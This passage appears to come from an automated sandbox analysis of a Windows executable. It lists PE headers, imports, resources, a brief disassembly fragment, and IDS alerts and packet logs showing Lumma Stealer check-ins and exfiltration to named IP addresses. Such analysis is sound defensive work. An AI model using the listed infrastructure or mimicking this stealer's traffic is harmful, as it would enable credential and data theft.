pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007FFAF4B9E101h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FFAF4B9BDB3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FFAF4B9BD2Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0x7716	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x105265	0x2860
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0x7716	0x7800	1d1f9f928aa4da29bc75c2420c91f18d	False	0.9464192708333333	data	7.79275431455329	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfc000	0xf32	0x1000	f1988f2c4de9afff2849c08e724fb7d1	False	0.599365234375	data	5.522920349068256	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf41f0	0x5060	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	0.9970353810264385
RT_ICON	0xf9250	0x1adb	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0016
RT_ICON	0xfad2c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6276595744680851
RT_DIALOG	0xfb194	0x100	data	English	United States	0.5234375
RT_DIALOG	0xfb294	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0xfb3b0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xfb410	0x30	data	English	United States	0.8958333333333334
RT_MANIFEST	0xfb440	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-29T17:55:38.948345+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.42.198	443	TCP
2024-12-29T17:55:39.696416+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49737	104.21.42.198	443	TCP
2024-12-29T17:55:39.696416+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	104.21.42.198	443	TCP
2024-12-29T17:55:40.963513+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.42.198	443	TCP
2024-12-29T17:55:41.772441+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49738	104.21.42.198	443	TCP
2024-12-29T17:55:41.772441+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	104.21.42.198	443	TCP
2024-12-29T17:55:43.374711+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.42.198	443	TCP
2024-12-29T17:55:45.852970+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.42.198	443	TCP
2024-12-29T17:55:48.136218+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.42.198	443	TCP
2024-12-29T17:55:52.495246+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.42.198	443	TCP
2024-12-29T17:55:53.302085+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49742	104.21.42.198	443	TCP
2024-12-29T17:55:54.556039+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.42.198	443	TCP
2024-12-29T17:55:56.632161+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49746	104.21.42.198	443	TCP
2024-12-29T17:55:57.419655+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49746	104.21.42.198	443	TCP
2024-12-29T17:55:59.388228+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49752	185.161.251.21	443	TCP
2024-12-29T17:56:01.600124+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49758	172.67.208.58	443	TCP
2024-12-29T17:56:02.622402+0100	2008438	ET MALWARE Possible Windows executable sent when remote host claims to send a Text File	1	172.67.208.58	443	192.168.2.4	49758	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 17:55:37.726479053 CET	49737	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:37.726530075 CET	443	49737	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:37.726603985 CET	49737	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:37.729571104 CET	49737	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:37.729587078 CET	443	49737	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:38.948255062 CET	443	49737	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:38.948344946 CET	49737	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:38.952398062 CET	49737	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:38.952414036 CET	443	49737	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:38.952649117 CET	443	49737	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:39.001096010 CET	49737	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:39.001955032 CET	49737	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:39.002000093 CET	49737	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:39.002024889 CET	443	49737	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:39.696425915 CET	443	49737	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:39.696527004 CET	443	49737	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:39.696582079 CET	49737	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:39.699018002 CET	49737	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:39.699038029 CET	443	49737	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:39.704683065 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:39.704731941 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:39.704802990 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:39.705066919 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:39.705080032 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:40.963366985 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:40.963512897 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:40.964643955 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:40.964654922 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:40.964889050 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:40.965951920 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:40.965967894 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:40.966020107 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.772459030 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.772505999 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.772533894 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.772567034 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.772595882 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.772654057 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:41.772654057 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:41.772684097 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.772718906 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:41.775089025 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.783440113 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.783580065 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.783597946 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:41.783608913 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.783651114 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:41.791970968 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.844932079 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:41.892200947 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.938726902 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:41.973639965 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.977214098 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.977344990 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.977365017 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:41.977391005 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.977440119 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:41.984740019 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.984833002 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.984877110 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:41.984955072 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:41.984966993 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:41.984982967 CET	49738	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:41.984987974 CET	443	49738	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:42.055041075 CET	49739	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:42.055094957 CET	443	49739	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:42.055258989 CET	49739	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:42.055449009 CET	49739	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:42.055464983 CET	443	49739	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:43.374615908 CET	443	49739	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:43.374711037 CET	49739	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:43.375924110 CET	49739	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:43.375940084 CET	443	49739	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:43.376173019 CET	443	49739	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:43.385874033 CET	49739	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:43.386025906 CET	49739	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:43.386059999 CET	443	49739	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:43.386115074 CET	49739	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:43.386123896 CET	443	49739	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:44.527892113 CET	443	49739	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:44.527981997 CET	443	49739	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:44.528130054 CET	49739	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:44.528162003 CET	49739	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:44.528179884 CET	443	49739	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:44.546349049 CET	49740	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:44.546390057 CET	443	49740	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:44.546467066 CET	49740	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:44.546765089 CET	49740	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:44.546776056 CET	443	49740	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:45.852901936 CET	443	49740	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:45.852969885 CET	49740	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:45.854171038 CET	49740	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:45.854181051 CET	443	49740	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:45.854413033 CET	443	49740	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:45.855581999 CET	49740	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:45.855684996 CET	49740	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:45.855710983 CET	443	49740	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:46.794969082 CET	443	49740	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:46.795057058 CET	443	49740	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:46.795106888 CET	49740	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:46.795238972 CET	49740	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:46.795258999 CET	443	49740	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:46.877022982 CET	49741	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:46.877070904 CET	443	49741	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:46.877147913 CET	49741	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:46.877433062 CET	49741	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:46.877444029 CET	443	49741	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:48.136025906 CET	443	49741	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:48.136218071 CET	49741	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:48.137276888 CET	49741	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:48.137300014 CET	443	49741	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:48.137556076 CET	443	49741	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:48.138690948 CET	49741	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:48.138845921 CET	49741	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:48.138887882 CET	443	49741	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:48.138961077 CET	49741	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:48.138978004 CET	443	49741	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:51.052896023 CET	443	49741	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:51.053010941 CET	443	49741	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:51.053077936 CET	49741	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:51.053215027 CET	49741	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:51.053251028 CET	443	49741	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:51.184851885 CET	49742	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:51.184892893 CET	443	49742	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:51.184971094 CET	49742	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:51.185261011 CET	49742	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:51.185271978 CET	443	49742	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:52.495162964 CET	443	49742	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:52.495245934 CET	49742	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:52.496455908 CET	49742	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:52.496467113 CET	443	49742	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:52.496701956 CET	443	49742	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:52.498081923 CET	49742	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:52.498163939 CET	49742	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:52.498172045 CET	443	49742	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:53.302073956 CET	443	49742	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:53.302148104 CET	443	49742	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:53.302293062 CET	49742	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:53.302320957 CET	49742	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:53.302340031 CET	443	49742	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:53.340976000 CET	49743	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:53.341084957 CET	443	49743	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:53.341180086 CET	49743	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:53.341500044 CET	49743	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:53.341538906 CET	443	49743	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:54.555953979 CET	443	49743	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:54.556039095 CET	49743	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:54.557250977 CET	49743	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:54.557259083 CET	443	49743	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:54.557491064 CET	443	49743	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:54.558660030 CET	49743	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:54.558768034 CET	49743	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:54.558774948 CET	443	49743	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:55.415940046 CET	443	49743	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:55.416038036 CET	443	49743	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:55.416096926 CET	49743	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:55.416220903 CET	49743	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:55.416243076 CET	443	49743	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:55.417840004 CET	49746	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:55.417889118 CET	443	49746	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:55.417964935 CET	49746	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:55.418268919 CET	49746	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:55.418282986 CET	443	49746	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:56.632091999 CET	443	49746	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:56.632160902 CET	49746	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:56.633419037 CET	49746	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:56.633424044 CET	443	49746	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:56.633650064 CET	443	49746	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:56.634969950 CET	49746	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:56.635005951 CET	49746	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:56.635034084 CET	443	49746	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:57.419678926 CET	443	49746	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:57.419770002 CET	443	49746	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:57.420099020 CET	49746	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:57.420315981 CET	49746	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:57.420315981 CET	49746	443	192.168.2.4	104.21.42.198
Dec 29, 2024 17:55:57.420331955 CET	443	49746	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:57.420340061 CET	443	49746	104.21.42.198	192.168.2.4
Dec 29, 2024 17:55:57.804745913 CET	49752	443	192.168.2.4	185.161.251.21
Dec 29, 2024 17:55:57.804836988 CET	443	49752	185.161.251.21	192.168.2.4
Dec 29, 2024 17:55:57.804914951 CET	49752	443	192.168.2.4	185.161.251.21
Dec 29, 2024 17:55:57.805280924 CET	49752	443	192.168.2.4	185.161.251.21
Dec 29, 2024 17:55:57.805308104 CET	443	49752	185.161.251.21	192.168.2.4
Dec 29, 2024 17:55:59.388132095 CET	443	49752	185.161.251.21	192.168.2.4
Dec 29, 2024 17:55:59.388227940 CET	49752	443	192.168.2.4	185.161.251.21
Dec 29, 2024 17:55:59.389554024 CET	49752	443	192.168.2.4	185.161.251.21
Dec 29, 2024 17:55:59.389602900 CET	443	49752	185.161.251.21	192.168.2.4
Dec 29, 2024 17:55:59.389827967 CET	443	49752	185.161.251.21	192.168.2.4
Dec 29, 2024 17:55:59.391033888 CET	49752	443	192.168.2.4	185.161.251.21
Dec 29, 2024 17:55:59.431344986 CET	443	49752	185.161.251.21	192.168.2.4
Dec 29, 2024 17:55:59.903517008 CET	443	49752	185.161.251.21	192.168.2.4
Dec 29, 2024 17:55:59.903589010 CET	443	49752	185.161.251.21	192.168.2.4
Dec 29, 2024 17:55:59.903650045 CET	49752	443	192.168.2.4	185.161.251.21
Dec 29, 2024 17:55:59.903851032 CET	49752	443	192.168.2.4	185.161.251.21
Dec 29, 2024 17:55:59.903897047 CET	443	49752	185.161.251.21	192.168.2.4
Dec 29, 2024 17:55:59.903945923 CET	49752	443	192.168.2.4	185.161.251.21
Dec 29, 2024 17:55:59.903961897 CET	443	49752	185.161.251.21	192.168.2.4
Dec 29, 2024 17:56:00.171587944 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:00.171627045 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:00.171681881 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:00.171941042 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:00.171952963 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:01.600063086 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:01.600123882 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:01.602583885 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:01.602591991 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:01.602827072 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:01.604630947 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:01.651345968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.370805025 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.370841980 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.370877028 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.370887041 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.370896101 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.370939016 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.370971918 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.370973110 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.370984077 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.371015072 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.371066093 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.371105909 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.371170998 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.422903061 CET	49758	443	192.168.2.4	172.67.208.58
